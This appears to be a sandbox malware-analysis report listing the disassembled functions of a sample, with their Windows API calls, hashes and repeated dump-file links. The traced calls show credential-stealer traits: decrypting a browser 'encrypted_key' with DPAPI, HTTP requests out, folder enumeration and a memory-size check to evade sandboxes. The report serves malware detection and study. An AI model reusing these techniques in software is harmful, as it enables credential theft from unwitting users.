Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
String ID: $"encrypted_key":"$DPAPI
API String ID: 2100535398-738592651
Opcode ID: 740edf8943466c597dbe2cf8aae0dffa4d63961c219c638431f9ffc7b9753d68
Instruction ID: ef24b928423bfa94ea9f7a999c62feb566ef80aa79c0d3a019aba06654d34daf
Opcode Fuzzy Hash: 740edf8943466c597dbe2cf8aae0dffa4d63961c219c638431f9ffc7b9753d68
Instruction Fuzzy Hash: B7312CB6D10209ABDF04DBE8DC85AEEB7B8FB49304F144519E905E6241EB349A44CBA2

Function 008B6AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01279198,?,008C110C,?,00000000,?,008C1110,?,00000000,008C0AEF), ref: 008B6ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 008B6AE8
CloseHandle.KERNEL32(00000000), ref: 008B6AF9
Sleep.KERNEL32(00001770), ref: 008B6B04
CloseHandle.KERNEL32(?,00000000,?,01279198,?,008C110C,?,00000000,?,008C1110,?,00000000,008C0AEF), ref: 008B6B1A
ExitProcess.KERNEL32 ref: 008B6B22

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: d49d8a20756c514d79b4a54ef3055d4179470620cec25850f2b552b3326dffdf
Instruction ID: 7e7e3a43380321761e17083ad7f06cd6ecc74d556b9a1b41278b43422669815b
Opcode Fuzzy Hash: d49d8a20756c514d79b4a54ef3055d4179470620cec25850f2b552b3326dffdf
Instruction Fuzzy Hash: B8F03470A40229ABEB10EBE09C4ABFE7A34FB14701F104915B502F92D1EBB46541DBA7

Function 008A47B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 008A4839
InternetCrackUrlA.WININET(00000000,00000000), ref: 008A4849

Strings

<, xrefs: 008A47C9

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlen
String ID: <
API String ID: 1274457161-4251816714
Opcode ID: 144c4428a1b844f96598d52079817e9c7f1457fb88166c176579fd33fb920d9d
Instruction ID: 42a85b6ba95eb72280b52668abd90bad90d5de336bf32144746461b0fadaf02c
Opcode Fuzzy Hash: 144c4428a1b844f96598d52079817e9c7f1457fb88166c176579fd33fb920d9d
Instruction Fuzzy Hash: 25216FB1D00209ABDF14DFA4E849ADE7B74FB44320F008625F919A72C1EB706A05CF92

Function 008B51F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 008BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008BA7E6

Part of subcall function 008A6280: InternetOpenA.WININET(008C0DFE,00000001,00000000,00000000,00000000), ref: 008A62E1
Part of subcall function 008A6280: StrCmpCA.SHLWAPI(?,0127EA70), ref: 008A6303
Part of subcall function 008A6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 008A6335
Part of subcall function 008A6280: HttpOpenRequestA.WININET(00000000,GET,?,0127E0F8,00000000,00000000,00400100,00000000), ref: 008A6385
Part of subcall function 008A6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 008A63BF
Part of subcall function 008A6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008A63D1

StrCmpCA.SHLWAPI(00000000,ERROR), ref: 008B5228

Strings

ERROR, xrefs: 008B521A
ERROR, xrefs: 008B5273

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
String ID: ERROR$ERROR
API String ID: 3287882509-2579291623
Opcode ID: 00ae95a0a92154c2d3f0f94557c7822b81af4820ce3483ca4b0e2455a0758289
Instruction ID: c02457e96f7f7d546f0d2e66b5a309ad238f4e030b4fc61a05562eca5232f896
Opcode Fuzzy Hash: 00ae95a0a92154c2d3f0f94557c7822b81af4820ce3483ca4b0e2455a0758289
Instruction Fuzzy Hash: B911EF30910548B6DB18FF68DD96AED7778FF50300F404168F91ADA692EF34AB05C693

Function 008A1220 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 008A123E
ExitProcess.KERNEL32 ref: 008A1294

Strings

@, xrefs: 008A1233

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 803317263-2766056989
Opcode ID: edb37137f32978ee57a64be7ff40570977f65984692822da9bb1abe6f56e441e
Instruction ID: a4f39301facf445028dd3b0fd6ae854c460827c7d7840cf4724749e5d9fd94c3
Opcode Fuzzy Hash: edb37137f32978ee57a64be7ff40570977f65984692822da9bb1abe6f56e441e
Instruction Fuzzy Hash: 1C01FBB0944308BAEF10DBE4CC89B9EBB78FB15705F248058E605FA680D774A545879A

Function 008B4F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 008B8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 008B8E0B

lstrcat.KERNEL32(?,00000000), ref: 008B4F7A
lstrcat.KERNEL32(?,008C1070), ref: 008B4F97
lstrcat.KERNEL32(?,01278FC8), ref: 008B4FAB
lstrcat.KERNEL32(?,008C1074), ref: 008B4FBD

Part of subcall function 008B4910: wsprintfA.USER32 ref: 008B492C
Part of subcall function 008B4910: FindFirstFileA.KERNEL32(?,?), ref: 008B4943

Part of subcall function 008B4910: StrCmpCA.SHLWAPI(?,008C0FDC), ref: 008B4971
Part of subcall function 008B4910: StrCmpCA.SHLWAPI(?,008C0FE0), ref: 008B4987
Part of subcall function 008B4910: FindNextFileA.KERNEL32(000000FF,?), ref: 008B4B7D
Part of subcall function 008B4910: FindClose.KERNEL32(000000FF), ref: 008B4B92

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID:
API String ID: 2667927680-0
Opcode ID: ef2edbbc818f0c37ccebef3e80c349a3ae33b30257573e43a241a9464e18ce69
Instruction ID: 51f208faec017282ee99a7be5998427d8b466d8a55b6483fb1fcb781be3eac9c
Opcode Fuzzy Hash: ef2edbbc818f0c37ccebef3e80c349a3ae33b30257573e43a241a9464e18ce69
Instruction Fuzzy Hash: 7A219B7A900208A7DB54F7F4DC86EE9377CF764300F004558B659D6291EE74AAC9CBA3

Function 008B0740 Relevance: 4.7, APIs: 3, Instructions: 217COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,01278F58), ref: 008B079A
StrCmpCA.SHLWAPI(00000000,01279028), ref: 008B0866
StrCmpCA.SHLWAPI(00000000,01279008), ref: 008B099D

Part of subcall function 008BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008BA7E6

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 8e66cce78f6244c037e9eafd88c2824529ec8342163e6cad70a44f9c25a86550
Instruction ID: 671cd4b82c463424ec55719425ad4301c718fbf6fac1f40a0c7595113dd2ba9e
Opcode Fuzzy Hash: 8e66cce78f6244c037e9eafd88c2824529ec8342163e6cad70a44f9c25a86550
Instruction Fuzzy Hash: C4915775A10108AFCB28EF68D995AED77B5FF95300F408518E849DF351DB30AA06CB93

Function 008B0765 Relevance: 4.7, APIs: 3, Instructions: 197COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,01278F58), ref: 008B079A
StrCmpCA.SHLWAPI(00000000,01279028), ref: 008B0866
StrCmpCA.SHLWAPI(00000000,01279008), ref: 008B099D

Part of subcall function 008BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008BA7E6

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
